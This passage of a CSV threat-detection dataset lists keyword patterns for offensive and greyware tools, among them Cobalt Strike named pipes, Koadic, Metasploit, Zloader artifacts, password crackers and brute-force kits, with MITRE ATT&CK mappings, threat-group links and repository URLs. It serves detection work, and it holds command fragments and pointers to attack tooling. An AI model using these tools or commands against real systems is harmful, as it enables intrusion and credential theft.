tools,N/A,N/A,N/A,N/A,POST Exploitation tools,https://github.com/zerosum0x0,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*zerosum0x0*koadic*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*ZGF0YS5mZGEuZ292*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*ZGIuc3NhLmdvdg==*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*zha0gongz1*,offensive_tool_keyword,cobaltstrike,Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/zha0gongz1/DesertFox,1,0,N/A,10,10,123,26,2023-02-02T07:02:12Z,2021-02-04T09:04:13Z -*zha0gongz1/DesertFox*,offensive_tool_keyword,cobaltstrike,Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/zha0gongz1/DesertFox,1,1,N/A,10,10,123,26,2023-02-02T07:02:12Z,2021-02-04T09:04:13Z -*Ziconius/FudgeC2*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*ziiiiizzzb*,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -*ziiiiizzzib*,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -*zip2john *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*--ZipFileName $TrustedDomain.zip*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*zippy.nim*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*Zloader-FCVP*,offensive_tool_keyword,Zloader,Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike,T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204,TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003,N/A,N/A,Exploitation tools,https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*zmap -*,greyware_tool_keyword,nmap,ZMap is a fast single packet network scanner designed for Internet-wide network surveys. On a typical desktop computer with a gigabit Ethernet connection. ZMap is capable scanning the entire public IPv4 address space in under 45 minutes. With a 10gigE connection and PF_RING. ZMap can scan the IPv4 address space in under 5 minutes. ZMap operates on GNU/Linux. Mac OS. and BSD. ZMap currently has fully implemented probe modules for TCP SYN scans. ICMP. DNS queries. UPnP. BACNET. and can send a large number of UDP probes. If you are looking to do more involved scans. e.g.. banner grab or TLS handshake. take a look at ZGrab. ZMaps sister project that performs stateful application-layer handshakes.,T1046 - T1065 - T1210.002 - T1095 - T1040,TA0002 - TA0007 - TA0008 - TA0011 - TA0001,N/A,N/A,Vulnerability scanner,https://github.com/zmap/zmap,1,0,greyware tool - risks of False positive !,N/A,10,5009,887,2023-09-26T15:13:35Z,2013-01-23T01:30:09Z -*zoom1.msi.gpg*,offensive_tool_keyword,Zloader,Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike,T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204,TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003,N/A,N/A,Exploitation tools,https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*zoom2.dll.gpg*,offensive_tool_keyword,Zloader,Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike,T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204,TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003,N/A,N/A,Exploitation tools,https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*zsh_executor *,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,0,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*zsploit-1.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*zsploit-2.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ztgrace*changeme*,offensive_tool_keyword,changeme,A default credential scanner.,T1110 - T1114 - T1112 - T1056,TA0001 - TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/ztgrace/changeme,1,1,N/A,N/A,10,1349,264,2021-12-26T10:20:11Z,2016-03-11T17:10:34Z -*ZxKmz4hXp6XKmTPg9lzgYxXN4sFr2pzo*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/insta-bf,1,0,N/A,7,1,39,6,2021-12-23T17:41:12Z,2020-11-20T22:22:48Z -*ZXZpZGVuY2UuZmJpLmdvdg==*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*zyn3rgy/LdapRelayScan*,offensive_tool_keyword,LdapRelayScan,Check for LDAP protections regarding the relay of NTLM authentication,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/zyn3rgy/LdapRelayScan,1,1,N/A,8,4,389,51,2023-09-04T05:43:00Z,2022-01-16T06:50:44Z -*zzzteph/weakpass*,offensive_tool_keyword,weakpass,Weakpass collection of tools for bruteforce and hashcracking,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/zzzteph/weakpass,1,1,N/A,10,3,293,36,2023-03-17T22:45:29Z,2021-08-29T13:07:37Z -*Zzzz Zzzzz Zzzz....*,offensive_tool_keyword,KrakenMask,A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.,T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/RtlDallas/KrakenMask,1,0,N/A,9,2,144,28,2023-08-08T15:21:28Z,2023-08-05T19:24:36Z -./beef,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,0,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -./CVE-20* -*,offensive_tool_keyword,POC,CVE POC execution,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-CachedintrospectionResults-Rce,1,0,N/A,N/A,1,37,14,2022-04-01T08:44:19Z,2022-04-01T07:55:26Z -./radare *,offensive_tool_keyword,RadareEye,Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Network Exploitation tools,https://github.com/souravbaghz/RadareEye,1,0,N/A,N/A,4,338,50,2021-12-11T06:16:37Z,2021-01-07T04:52:58Z -.exe -t keepass -f *,offensive_tool_keyword,SharPersist,SharPersist Windows persistence toolkit written in C#.,T1547 - T1053 - T1027 - T1028 - T1112,TA0003 - TA0008,N/A,N/A,Persistence,https://github.com/fireeye/SharPersist,1,0,N/A,10,10,1150,233,2023-08-11T00:52:09Z,2019-06-21T13:32:14Z -/adhunt.py,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -\\demoagent_11,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\demoagent_22,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\DserNamePipe*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\f4c3*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\f53f*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\fullduplex_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\interprocess_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\lsarpc_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\mojo_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda 